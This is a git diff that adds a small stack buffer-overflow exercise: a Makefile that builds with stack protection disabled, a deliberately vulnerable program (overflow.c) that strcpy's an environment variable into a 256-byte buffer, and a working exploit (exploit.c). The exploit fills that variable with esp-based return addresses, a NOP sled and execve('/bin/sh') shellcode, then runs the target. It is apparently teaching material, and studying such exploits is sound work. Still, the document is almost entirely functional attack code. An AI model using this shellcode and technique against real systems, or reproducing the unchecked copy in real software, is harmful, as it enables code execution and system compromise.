diff options
| -rwxr-xr-x | Makefile | 15 | ||||
| -rw-r--r-- | exploit.c | 51 | ||||
| -rw-r--r-- | overflow.c | 34 |
3 files changed, 100 insertions, 0 deletions
diff --git a/Makefile b/Makefile new file mode 100755 index 0000000..f6d973d --- /dev/null +++ b/Makefile @@ -0,0 +1,15 @@ +RM := rm + +all: exploit overflow + +exploit: + @echo 'building exploit' + gcc -g -fno-stack-protector exploit.c -o exploit + +overflow: + @echo 'building overflow' + gcc -g -fno-stack-protector overflow.c -o overflow + +clean: + -$(RM) overflow exploit + -@echo ' ' diff --git a/exploit.c b/exploit.c new file mode 100644 index 0000000..3137c91 --- /dev/null +++ b/exploit.c @@ -0,0 +1,51 @@ +/* + * main.c + * + * Created on: 27.01.2012 + * Author: druid + */ + +#include <unistd.h> +#include <stdio.h> +#include <stdlib.h> +#include <fcntl.h> +#include <sys/stat.h> +#include <string.h> + +#define PATH_CT "./overflow" +#define ENV_VAR "EXPLOIT" +#define NOP 0x90 + + +static char shellcode[]= +"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" +"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; + +u_long +esp() +{ + __asm__("movl %esp, %eax"); +} + +int +main() +{ + + u_char buf[1032]; + u_long addr; + int i; + + strcpy(buf, "/usr/bin/pico; "); + + addr = esp() - 192; + for (i = 16; i < 128 + 16; i += 4) + *((u_long *) (buf + i)) = addr; + for (i = 128 + 16; i < 1040; i++) + buf[i] = 0x90; + for (i = 0; i < strlen(shellcode); i++) + buf[1040 + i] = shellcode[i]; + buf[1040 + i] = '\n'; + + setenv(ENV_VAR, buf, 1); + execl(PATH_CT, "overflow", (char *) 0); +} diff --git a/overflow.c b/overflow.c new file mode 100644 index 0000000..de2a1ab --- /dev/null +++ b/overflow.c @@ -0,0 +1,34 @@ +/* + * overflow.c + * + * Created on: 27.01.2012 + * Author: druid + */ + +#include <stdlib.h> +#include <stdio.h> +#include <string.h> + +#define ENV_VAR "EXPLOIT" +#define BUFLEN 256 + +u_char buf[BUFLEN]; +u_char *env; + +int +main() +{ + if (env = getenv(ENV_VAR)) + { + fprintf(stderr, "env: "ENV_VAR" set\n"); + fprintf(stderr, "env: %s\n", env); + + strcpy(buf, env); + } + else + { + fprintf(stderr, "env: "ENV_VAR" not set, abort!\n"); + } + + return 0; +} |